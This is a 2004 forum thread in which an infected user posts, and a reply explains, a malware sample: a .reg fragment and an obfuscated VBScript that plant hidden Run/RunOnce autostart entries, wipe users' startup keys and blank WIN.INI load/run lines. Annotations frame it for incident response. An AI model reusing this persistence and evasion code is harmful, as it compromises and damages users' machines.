作者: zeng7071 [zeng7071] 论坛用户 | 登录 |
; ---------------------------------------------------------------------------
; Part 1: a Registry Editor (.reg) fragment.
;   [-KEY]      removes the whole key (and every value under it)
;   "name"=-    removes a single value
; Net effect: the user's HKCU Run key is wiped and recreated with only a
; default value, and two "LogFeil" autostart entries are planted.  For an
; incident responder the things to look for are the directory
; C:\$NtUninstallQ8875736$ (named like a Windows hotfix uninstall folder,
; presumably so it is overlooked — confirm on the host) and the value name
; "LogFeil" under the Run / RunOnce keys.
; ---------------------------------------------------------------------------
; Delete and recreate the per-user Run key, leaving one default value that
; silently imports WINSYS.cer with "regedit -s" (the .cer extension is
; cosmetic; regedit treats the file as .reg content — verify the file).
[-HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
@="regedit -s C:\\$NtUninstallQ8875736$\\WINSYS.cer"
; Delete and recreate the machine-wide RunOnce key; "LogFeil" runs the
; VBScript in part 2 at next logon.
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"LogFeil"="C:\\$NtUninstallQ8875736$\\WINSYS.vbs"
; Machine-wide Run key: re-import WINSYS.cer at every boot, keep
; "internat.exe", and remove a long list of other autostart value names
; (apparently earlier/competing infections — cannot be confirmed from here).
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"LogFeil"="regedit -s C:\\$NtUninstallQ8875736$\\WINSYS.cer"
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
"W1N32"=-
"Abank"=-
"Ziplog"=-
"SystemServices"=-
"stup"=-
"Services"=-
"WJQ32"=-
"syslog"=-
' ---------------------------------------------------------------------------
' Part 2: the VBScript (WINSYS.vbs).  Every ProgID and registry path is
' split into short string pieces and glued back together with + / &, so
' the literal strings "WScript.Shell", "Scripting.FileSystemObject" and
' "...\CurrentVersion\Run" never appear in the file — a simple evasion of
' signature-based scanners.  Detection should therefore key on behaviour
' (RegWrite/RegDelete on the Run keys, rewrite of WIN.INI) rather than on
' those strings.
' ---------------------------------------------------------------------------
' "WSc"+"ript.Sh"+"ell"  ==>  "WScript.Shell"
Set sss = CreateObject("WSc" + "ript.Sh" + "ell")
' mhk  ==> "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\"
' mhc  ==> "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\"
mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\"
' mhk2 ==> "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\"
mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\"
' Persistence: the same two HKLM\...\Run values the .reg fragment plants.
sss.RegWrite ""&mhk&"LogFeil","regedit -s C:\$NtUninstallQ8875736$\WINSYS.cer"
sss.RegWrite ""&mhk&"internat.exe","internat.exe"
' Each of the following value names is first written with the dummy data
' "12" and then deleted further down.  The write-then-delete pairing is
' presumably there because WScript.Shell.RegDelete raises an error when the
' target does not exist; creating it first makes the deletion always
' succeed (not verifiable from this listing — confirm).  The net effect is
' simply removal of these autostart entries.
sss.RegWrite ""&mhk&"zwupdows","12"
sss.RegWrite ""&mhk&"win","12"
sss.RegWrite ""&mhk&"mwin","12"
sss.RegWrite ""&mhk&"internt","12"
sss.RegWrite ""&mhk&"Inernet","12"
sss.RegWrite ""&mhk&"Internet","12"
sss.RegWrite ""&mhk&"iexpleror","12"
sss.RegWrite ""&mhk&"zxdows","12"
sss.RegWrite ""&mhk&"qwe","12"
sss.RegWrite ""&mhk&"win1","12"
sss.RegWrite ""&mhk&"intelnat.exe","12"
sss.RegWrite ""&mhk&"u1888","12"
sss.RegWrite ""&mhk&"intenet","12"
sss.RegWrite ""&mhk&"9i5zxdows","12"
sss.RegWrite ""&mhk&"9i5com01zxdows","12"
sss.RegWrite ""&mhk&"99zxdows","12"
sss.RegWrite ""&mhk&"88zxdows","12"
sss.RegWrite ""&mhk&"Start Pagewin","12"
sss.RegWrite ""&mhk&"Start Page","12"
sss.RegWrite ""&mhk&"u188","12"
sss.RegWrite ""&mhk&"9i5comzxdows","12"
sss.RegWrite ""&mhk&"9q5zxdows","12"
sss.RegWrite ""&mhk&"u1881","12"
sss.RegWrite ""&mhk&"u1882","12"
sss.RegWrite ""&mhk&"u1883","12"
sss.RegWrite ""&mhk&"u1884","12"
sss.RegWrite ""&mhk&"u1885","12"
sss.RegWrite ""&mhk&"u1886","12"
sss.RegWrite ""&mhk&"u1887","12"
sss.RegWrite ""&mhk&"u88y", "12"
sss.RegWrite ""&mhk&"flash", "12"
sss.RegWrite ""&mhk&"999izxdows","12"
sss.RegWrite ""&mhk&"033zxdows","12"
sss.RegWrite ""&mhk&"syste","12"
' A dummy value under HKCU\...\Run so that the key exists before the
' whole key is deleted below.
sss.RegWrite ""&mhc&"my","12"
sss.RegWrite ""&mhk&"3zxdows","12"
sss.RegWrite ""&mhk&"88u88","12"
sss.RegWrite ""&mhk&"system","12"
sss.RegWrite ""&mhk&"8zxdows","12"
sss.RegWrite ""&mhk&"u18","12"
sss.RegWrite ""&mhk&"interneet.exe","12"
' Same trick for HKLM\...\CurrentVersion\RunOnce (trailing "\" = a key).
sss.RegWrite ""&mhk2&"RunOnce\", "12"
sss.RegWrite ""&mhk&"iexpler", "12"
sss.RegWrite ""&mhk&"u1810", "12"
sss.RegWrite ""&mhk&"winwin", "12"
sss.RegWrite ""&mhk&"WIN32", "12"
sss.RegWrite ""&mhk&"W1N32", "12"
' Delete the ENTIRE per-user Run key (path ends in "\", so RegDelete
' removes the key, not a value).  Any legitimate per-user autostart
' entries the victim had are lost as well.
sss.RegDelete ""&mhc&""
' Remove the autostart values written above.  Note the names are not a
' perfect match for the writes ("inernet" here vs "Inernet" above); the
' script does not check for errors.
sss.RegDelete ""&mhk&"zwupdows"
sss.RegDelete ""&mhk&"win"
sss.RegDelete ""&mhk&"mwin"
sss.RegDelete ""&mhk&"internt"
sss.RegDelete ""&mhk&"inernet"
sss.RegDelete ""&mhk&"Internet"
sss.RegDelete ""&mhk&"u188"
sss.RegDelete ""&mhk&"iexpleror"
sss.RegDelete ""&mhk&"zxdows"
sss.RegDelete ""&mhk&"qwe"
sss.RegDelete ""&mhk&"win1"
sss.RegDelete ""&mhk&"intelnat.exe"
sss.RegDelete ""&mhk&"intenet"
sss.RegDelete ""&mhk&"9i5zxdows"
sss.RegDelete ""&mhk&"9i5com01zxdows"
sss.RegDelete ""&mhk&"99zxdows"
sss.RegDelete ""&mhk&"88zxdows"
sss.RegDelete ""&mhk&"Start Pagewin"
sss.RegDelete ""&mhk&"Start Page"
sss.RegDelete ""&mhk&"9i5comzxdows"
sss.RegDelete ""&mhk&"9q5zxdows"
sss.RegDelete ""&mhk&"999izxdows"
sss.RegDelete ""&mhk&"033zxdows"
sss.RegDelete ""&mhk&"u1881"
sss.RegDelete ""&mhk&"u1882"
sss.RegDelete ""&mhk&"u1883"
sss.RegDelete ""&mhk&"u1884"
sss.RegDelete ""&mhk&"u1885"
sss.RegDelete ""&mhk&"u1886"
sss.RegDelete ""&mhk&"u1887"
sss.RegDelete ""&mhk&"u88y"
sss.RegDelete ""&mhk&"flash"
sss.RegDelete ""&mhk&"88u88"
sss.RegDelete ""&mhk&"interneet.exe"
sss.RegDelete ""&mhk&"u18"
sss.RegDelete ""&mhk&"u1888"
sss.RegDelete ""&mhk&"system"
sss.RegDelete ""&mhk&"3zxdows"
sss.RegDelete ""&mhk&"8zxdows"
sss.RegDelete ""&mhk&"syste"
' Delete the whole HKLM\...\RunOnce key.
sss.RegDelete ""&mhk2&"RunOnce\"
sss.RegDelete ""&mhk&"iexpler"
sss.RegDelete ""&mhk&"u1810"
sss.RegDelete ""&mhk&"winwin"
sss.RegDelete ""&mhk&"WIN32"
sss.RegDelete ""&mhk&"W1N32"
' ---------------------------------------------------------------------------
' Part 3: rewrite C:\WINDOWS\WIN.INI.  On Windows 9x/ME the "load=" and
' "run=" lines of WIN.INI are another (legacy) autostart mechanism; this
' section blanks them.  The offsets below assume CRLF line endings
' (the -3 / -1 arithmetic skips the CR LF before the keyword).
' ---------------------------------------------------------------------------
' "Scrip"+"ting."+"FileSyst"+"emO"+"bject"  ==>  "Scripting.FileSystemObject"
Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject")
myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI")
if myfile14 then
' Read the whole file and locate the three keywords (1-based positions).
set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI")
mywin=FSO2.ReadALL()
l=Instr(mywin,"run=")-3
m=Instr(mywin,"load=")-1
n=Instr(mywin,"NullPort=")-3
FSO2.close
' Only proceed when both keywords exist and "run=" comes after "load=".
if l>0 and m>0 and l>m then
' mywin2 = everything before the line that holds "run="
set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI")
mywin2=FSO3.Read(l)
FSO3.close
' mywin3 = everything before "load="
set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI")
mywin3=FSO4.Read(m)
FSO4.close
if n>0 and n>l then
' "NullPort=" follows "run=": cut everything up to the NullPort line and
' write back  <prefix> + "load=" + CRLF + "run=" + <NullPort= onward>,
' i.e. both load= and run= become empty and anything that stood between
' load= and NullPort= is dropped.
set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI")
mywin4=FSO5.Read(n)
FSO5.close
mywin=Replace(mywin,mywin4,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.WriteLine "load="
FSO2.Write "run="
FSO2.Write mywin
FSO2.close
else
' No NullPort= after run=: write back <prefix> + "load=" + <run= line
' onward>, so only the load= line is blanked and run= is kept as-is.
mywin=Replace(mywin,mywin2,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.Write "load="
FSO2.Write mywin
FSO2.close
end if
end if
end if
能不能帮解释一下这个代表什么呢,我知道上面的那些,作用都是在启动过程中加载我中毒的那些文件,可是后面的就看不懂了,帮忙解释一下好吗 |
地主 发表时间: 04-05-18 09:56 |
回复: hackgou [hackgou] 论坛用户 | 登录 |
一楼的兄弟主要说的是: sss 和 FSO、FSO2 到 FSO5 这几个对象吧。 先看看: Set sss = CreateObject("WSc" + "ript.Sh" + "ell") 这就相当于 Set sss = CreateObject("WScript.Shell");这下就简单了吧,写这个脚本的人多半是为了躲避防火墙的检测才故意绕的这个弯的。 然后用 sss.RegWrite ""&mhk&"W1N32", "12" 和 sss.RegDelete ""&mhc&"" 来操作注册表。 至于 FSO、FSO2 到 FSO5 也是类似的: Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject") 就等于: Set FSO = CreateObject("Scripting.FileSystemObject") 然后用 FSO 来读写文件系统。 |
B1层 发表时间: 04-05-18 11:10 |
回复: zeng7071 [zeng7071] 论坛用户 | 登录 |
"internat.exe"="internat.exe" "zwupdows"=- "win"=- "mwin"=- "intenet"=- "Inernet"=- "Internet"=- "iexpleror"=- "zxdows"=- "qwe"=- "win1"=- "winwin"=- "9i5zxdows"=- "9i5com01zxdows"=- "99zxdows"=- "syste"=- "intelnat.exe"=- "88zxdows"=- "Start Pagewin"=- "Start Page"=- "9i5comzxdows"=- "9q5zxdows"=- "999izxdows"=- "033zxdows"=- "8zxdows"=- "flash"=- "3zxdows"=- "interneet.exe"=- "u88y"=- "88u88"=- "u18"=- "u1881"=- "u1882"=- "u1883"=- "u1884"=- "u1885"=- "u1886"=- "u1887"=- "u1888"=- "system"=- "u188"=- "iexpler"=- "u1810"=- "WIN32"=- "W1N32"=- "Abank"=- "Ziplog"=- "SystemServices"=- "stup"=- "Services"=- "WJQ32"=- "syslog"=- 谢谢.楼上的朋友,那这些呢,这些后面用"-"这个的作用是什么呢 |
B2层 发表时间: 04-05-19 11:43 |